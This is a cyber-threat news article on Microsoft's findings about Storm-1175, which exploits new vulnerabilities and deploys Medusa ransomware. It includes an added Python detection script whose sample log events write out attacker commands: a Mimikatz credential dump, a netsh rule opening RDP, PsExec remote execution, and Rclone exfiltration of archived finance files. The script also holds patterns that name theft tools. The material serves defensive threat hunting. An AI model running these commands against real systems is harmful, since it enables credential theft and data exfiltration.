
China-Linked Hackers Deploy Ransomware within 24 Hours of Breaching Networks, Microsoft Warns

By: Joahn G
Last updated: April 7, 2026
  • Microsoft’s Threat Intelligence team has tied a China-linked hacking group, Storm-1175, to a wave of high-speed ransomware attacks exploiting zero-day and recently disclosed vulnerabilities.

  • Storm-1175 deploys Medusa ransomware within days (sometimes within 24 hours) of breaking into a target’s network.

  • Healthcare, education, finance, and professional services organizations across Australia, the UK, and the US are absorbing the heaviest hits.


A China-linked threat actor is moving through corporate networks at a pace that has security researchers worried.

Microsoft's Threat Intelligence team has formally tied Storm-1175 to a calculated campaign that exploits zero-day and freshly disclosed vulnerabilities in internet-facing systems, in some cases chaining several together, and rapidly drops Medusa ransomware before most organizations can even respond.

Microsoft’s researchers described the group’s approach bluntly, noting that Storm-1175’s “high operational proficiency and tempo in identifying leaked perimeter assets” has made it particularly dangerous to healthcare organizations, as well as those in education, professional services, and finance across Australia, the United Kingdom, and the United States.

Storm-1175 Burns Through Exploits Faster than Patches Ship

Storm-1175 does not wait around. The group consistently targets vulnerabilities during the dangerous window between public disclosure and when organizations finally apply the available patch.

Microsoft warned that the group “rotates exploits quickly during the time between disclosure and patch availability or adoption, taking advantage of the period where many organizations remain unprotected.”

Since 2023, Microsoft has linked Storm-1175 to the exploitation of more than 16 vulnerabilities across widely used platforms, including flaws in Microsoft Exchange Server, Ivanti Connect Secure, JetBrains TeamCity, ConnectWise ScreenConnect, CrushFTP, SimpleHelp, BeyondTrust, and SmarterTools SmarterMail, among others. Two of them, CVE-2025-10035 and CVE-2026-23760, Storm-1175 exploited as zero-days, before the vendor had shipped a patch or researchers had disclosed the flaw publicly.

The group has also been expanding its reach. As of late 2024, Storm-1175 began targeting Linux systems, hitting vulnerable Oracle WebLogic instances across multiple organizations. The exact vulnerability it used in those attacks remains unconfirmed.

In select cases, the group chains multiple exploits together (such as the OWASSRF chain against Exchange Server) to deepen post-compromise access. Storm-1175 does not simply break in and sit still. It moves fast and hits hard.

Inside the Playbook: How Storm-1175 Moves Once It’s in

Once Storm-1175 establishes a foothold inside a network, it wastes no time. The group creates new user accounts to maintain persistence, deploys web shells, and installs legitimate remote monitoring and management software (tools like Atera, AnyDesk, ConnectWise ScreenConnect, MeshAgent, and SimpleHelp) so that its command-and-control traffic blends into the trusted, encrypted sessions those tools normally generate, reducing the chance of detection.

From there, Storm-1175 moves laterally using built-in or widely trusted tooling rather than custom malware: PowerShell, the Sysinternals PsExec utility, and Impacket. It also leverages PDQ Deploy, a legitimate software-deployment product, to push both lateral movement tools and ransomware payloads across the network.

To ensure Medusa runs unimpeded, the group modifies Windows Firewall policies to enable Remote Desktop Protocol access and deliberately adds Microsoft Defender Antivirus exclusions so the ransomware payload is neither flagged nor blocked.

Storm-1175 then runs credential-dumping tools (Mimikatz and Impacket) to harvest account credentials before it begins collecting files. The group uses Bandizip to gather and compress the stolen data, then Rclone to exfiltrate the archives.
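The playbook above (new accounts, RMM installs, an RDP firewall change, Defender exclusions, credential dumping, archiving, and Rclone exfiltration) is exactly what a detection engineer would hunt for, and it also covers the closing advice about treating unexpected RMM activity as a red flag. What follows is an added example of that hunt written for this page; it is not Microsoft's or TorNews's code. It assumes Windows events have been shipped as flat records with host, time, event_id, image, cmdline and message fields, uses genuine Windows event IDs (4720, 4946, 4688, 5007), and the executable names it matches on and the sample events it runs over are assumptions constructed for the demonstration.

```python
"""Hunt for the Storm-1175 post-compromise playbook in Windows event logs.
Added example, not Microsoft's or the article's code. The event IDs are genuine Windows IDs;
the flat record layout and SAMPLE_EVENTS are constructed assumptions about a log shipper's output."""
import re
from collections import defaultdict

EVT_USER_CREATED = 4720     # Security: a user account was created
EVT_FW_RULE_ADDED = 4946    # Security: rule added to the Windows Firewall exception list
EVT_PROCESS_CREATED = 4688  # Security: new process (needs command-line auditing enabled)
EVT_DEFENDER_CONFIG = 5007  # Microsoft-Windows-Windows Defender/Operational: config changed

# On-disk names for the tools the article lists: assumed typical names, not Microsoft's list.
RMM_IMAGES = {"anydesk.exe", "ateraagent.exe", "meshagent.exe",
              "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
LATERAL_IMAGES = {"psexec.exe", "psexec64.exe", "pdqdeployrunner-1.exe"}
CRED_DUMP_IMAGES = {"mimikatz.exe"}
COLLECTION_IMAGES = {"bandizip.exe", "bc.exe"}  # bc.exe: Bandizip's console archiver
EXFIL_IMAGES = {"rclone.exe"}
IMPACKET_SCRIPTS = ("secretsdump", "wmiexec", "smbexec", "atexec", "psexec.py")

# A 5007 message names the changed registry value; an Exclusions\ key is an AV exclusion.
DEFENDER_EXCLUSION_RE = re.compile(
    r"New value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
    r"(Paths|Processes|Extensions)\\(.+?)\s*=", re.IGNORECASE)
# The usual one-liner for opening RDP through Windows Firewall from a shell.
RDP_FIREWALL_RE = re.compile(
    r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="remote desktop".*enable=yes', re.IGNORECASE)

def classify(event):
    """Map one event to zero or more 'stage:detail' tags from the playbook."""
    tags = []
    eid = event.get("event_id")
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("cmdline", "").lower()
    message = event.get("message", "")
    if eid == EVT_USER_CREATED:
        tags.append("persistence:new_account")
    elif eid == EVT_FW_RULE_ADDED and "remote desktop" in message.lower():
        tags.append("defense_evasion:rdp_firewall_rule")
    elif eid == EVT_DEFENDER_CONFIG:
        m = DEFENDER_EXCLUSION_RE.search(message)
        if m:
            tags.append(f"defense_evasion:defender_exclusion:{m.group(2)}")
    elif eid == EVT_PROCESS_CREATED:
        if image in RMM_IMAGES:
            tags.append(f"persistence:rmm_tool:{image}")
        if image in LATERAL_IMAGES or any(s in cmdline for s in IMPACKET_SCRIPTS):
            tags.append("lateral_movement:remote_exec_tool")
        if image in CRED_DUMP_IMAGES or "sekurlsa::" in cmdline:  # catches a renamed Mimikatz
            tags.append("credential_access:dump_tool")
        if image in COLLECTION_IMAGES:
            tags.append("collection:archiver")
        if image in EXFIL_IMAGES:
            tags.append("exfiltration:rclone")
        if RDP_FIREWALL_RE.search(cmdline):
            tags.append("defense_evasion:rdp_enabled")
    return tags

def hunt(events):
    """Group findings per host; the number of distinct stages on one host drives the verdict."""
    per_host = defaultdict(list)
    for ev in events:
        for tag in classify(ev):
            per_host[ev["host"]].append((ev["time"], tag))
    report = {}
    for host, hits in per_host.items():
        stages = {tag.split(":", 1)[0] for _, tag in hits}
        report[host] = {"stages": len(stages), "findings": sorted(hits),
                        "verdict": "likely intrusion" if len(stages) >= 3 else "review"}
    return report

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"host": "WS-FIN-07", "time": "2026-04-01T02:11:05Z", "event_id": 4720,
     "message": "A user account was created. New Account: Account Name: svc_backup2"},
    {"host": "WS-FIN-07", "time": "2026-04-01T02:14:40Z", "event_id": 4688, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"host": "WS-FIN-07", "time": "2026-04-01T02:15:02Z", "event_id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. Old value:  New value: "
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Update = 0x0"},
    {"host": "WS-FIN-07", "time": "2026-04-01T02:20:11Z", "event_id": 4688, "image": r"C:\ProgramData\Update\AnyDesk.exe",
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\Update --start-with-win --silent"},
    {"host": "WS-FIN-07", "time": "2026-04-01T03:02:19Z", "event_id": 4688, "image": r"C:\ProgramData\Update\mk.exe",
     "cmdline": "mk.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"host": "WS-FIN-07", "time": "2026-04-01T03:40:55Z", "event_id": 4688, "image": r"C:\ProgramData\Update\PsExec64.exe",
     "cmdline": r"PsExec64.exe -accepteula \\FS01 -s -d cmd /c C:\ProgramData\Update\run.exe"},
    {"host": "WS-FIN-07", "time": "2026-04-01T04:05:30Z", "event_id": 4688, "image": r"C:\ProgramData\Update\bc.exe",
     "cmdline": r"bc.exe c -y C:\ProgramData\Update\fin.zip D:\Shares\Finance"},
    {"host": "WS-FIN-07", "time": "2026-04-01T04:31:12Z", "event_id": 4688, "image": r"C:\ProgramData\Update\rclone.exe",
     "cmdline": r"rclone.exe copy C:\ProgramData\Update\fin.zip remote:drop --transfers 8"},
    # A host with one ordinary-looking IT remote session: worth a look, not an intrusion on its own.
    {"host": "WS-HR-02", "time": "2026-04-01T09:00:00Z", "event_id": 4688,
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
]

if __name__ == "__main__":
    for host, r in hunt(SAMPLE_EVENTS).items():
        print(host, r["stages"], "stage(s):", r["verdict"], [t for _, t in r["findings"]])
```

Run as a script it prints one line per host. Two design points matter in practice: the Mimikatz check keys on the `sekurlsa::` module syntax in the command line, so the renamed `mk.exe` in the sample still trips it, which is why command-line auditing for event 4688 has to be switched on; and a lone RMM install only yields "review", so the RMM set should be replaced with the agents the organization has actually approved, after which any install outside that set is the red flag the article describes.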

From initial access to full ransomware deployment, the entire operation can wrap up within a few days. In the most aggressive cases, Storm-1175 has completed the full attack chain in under 24 hours.

This speed is reminiscent of a recent Cisco firewall zero-day campaign, in which attackers exploited the flaw for weeks before a patch was released. The lesson is the same whether the window is hours or weeks: every moment of delay in patching gives attackers the advantage.

Why this Threat is Bigger than One Hacking Group

Storm-1175’s playbook reveals a broader and deeply concerning shift in how threat actors operate. RMM tools, software that organizations legitimately use for IT management, are quietly becoming dual-use weapons.

Storm-1175 exploits the trusted, encrypted nature of these platforms to hide malicious traffic in plain sight, making detection significantly harder for security teams.

The financially motivated group is not slowing down. Organizations running unpatched internet-facing systems, particularly in healthcare and finance, remain Storm-1175’s most accessible targets.

Patching fast, restricting user privileges, monitoring for UAC bypass attempts, and treating unexpected RMM activity as a red flag are no longer optional precautions; they are urgent necessities. In practice that means keeping an allowlist of the RMM agents the organization actually uses and alerting on any other agent install, and treating a new Defender exclusion or a firewall change that opens RDP as an incident signal rather than routine administration.


About the Author

Joahn G, Cyber Threat Journalist

Joahn is a cyber threat journalist dedicated to tracking the evolving landscape of digital risks. His reporting focuses on ransomware gangs, data breach incidents, and state-sponsored cyber operations. By analyzing threat actor motives and tactics, he provides timely intelligence that helps readers understand and anticipate the security challenges of tomorrow.